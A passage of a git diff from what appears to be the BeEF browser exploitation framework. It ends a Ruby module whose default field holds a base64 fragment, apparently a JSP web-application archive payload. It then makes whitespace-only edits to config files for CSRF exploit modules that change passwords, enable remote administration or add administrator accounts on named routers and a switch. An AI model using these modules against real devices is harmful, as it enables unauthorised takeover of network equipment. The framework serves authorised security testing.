AACADSlcEwGmQ0sGYAAAB4AAAAJwAAAAAAAAAAAAAApIEPAQAAV0VCLUlORi9jbGFzc2VzL0xvY2FsU3RyaW5ncy5wcm9wZXJ0aWVzUEsBAhQDCgAAAAAABgRSMwAAAAAAAAAAAAAAAAcAAAAAAAAAAAAQAO1BugEAAGltYWdlcy9QSwECFAMKAAAACABEFG4xKCfJPgkBAACDAQAAEwAAAAAAAAAAAAAApIHfAQAAV0VCLUlORi9zdW4td2ViLnhtbFBLAQIUAwoAAAAIAEQUbjG75+0QEAEAALYBAAAPAAAAAAAAAAAAAACkgRkDAABXRUItSU5GL3dlYi54bWxQSwECFAMKAAAACABAEIYw/SBAXA8FAAAZBQAAFgAAAAAAAAAAAAAApIFWBAAAaW1hZ2VzL2R1a2Uud2F2aW5nLmdpZlBLAQIUAwoAAAAIAEMUbjGniE2h1wEAABsDAAAJAAAAAAAAAAAAAACkgZkJAABpbmRleC5qc3BQSwECFAMKAAAACABDFG4x3TPYC4EBAACiAgAADAAAAAAAAAAAAAAApIGXCwAAcmVzcG9uc2UuanNwUEsFBgAAAAALAAsArgIAAEINAAAAAA==', 'type' => 'textarea', 'width' => '400px', 'height' => '800px' }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+ end
+
+end
diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml
index 022045eb9..39034eba7 100644
--- a/modules/exploits/router/bt_home_hub_csrf/config.yaml
+++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
bt_home_hub_csrf:
enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
name: "BT Home Hub CSRF"
description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router."
authors: ["bcoles"]
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
index b502288f1..c579a47b9 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5367_csrf:
enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
name: "Comtrend CT-5367 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router."
authors: ["bcoles"]
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
index fe71d96bf..27f47c06e 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5624_csrf:
enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
name: "Comtrend CT-5624 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router."
authors: ["bcoles"]
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
index aab56869a..d7e6ace24 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
+++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
dlink_dsl500t_csrf:
enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
name: "D-Link DSL500T CSRF"
description: "Attempts to change the password on a D-Link DSL500T router."
authors: ["bcoles"]
diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml
index 0ccbe8c1d..d12a65130 100644
--- a/modules/exploits/router/huawei_smartax_mt880/config.yaml
+++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
Huawei_smartax_mt880_csrf:
enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
name: "Huawei SmartAX MT880 CSRF"
description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router."
authors: ["bcoles"]
diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
index 790045b2f..d3308de95 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml
+++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
linksys_befsr41_csrf:
enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
name: "Linksys BEFSR41 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router."
authors: ["Martin Barbella"]
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
index de9c1162d..a64dd89fd 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g2_csrf:
enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
name: "Linksys WRT54G2 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router."
authors: ["Martin Barbella"]
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
index a85f8d5f4..4129d26e1 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g_csrf:
enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
name: "Linksys WRT54G CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G router."
authors: ["Martin Barbella"]
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
index 42798a2d3..6402686d4 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
+++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
Netgear_gs108t_csrf:
enable: true
- category: ["Exploits","Switch"]
+ category: ["Exploits", "Switch"]
name: "Netgear GS108T CSRF"
description: "Attempts to change the password on a Netgear GS108T managed switch."
authors: ["Bart Leppens"]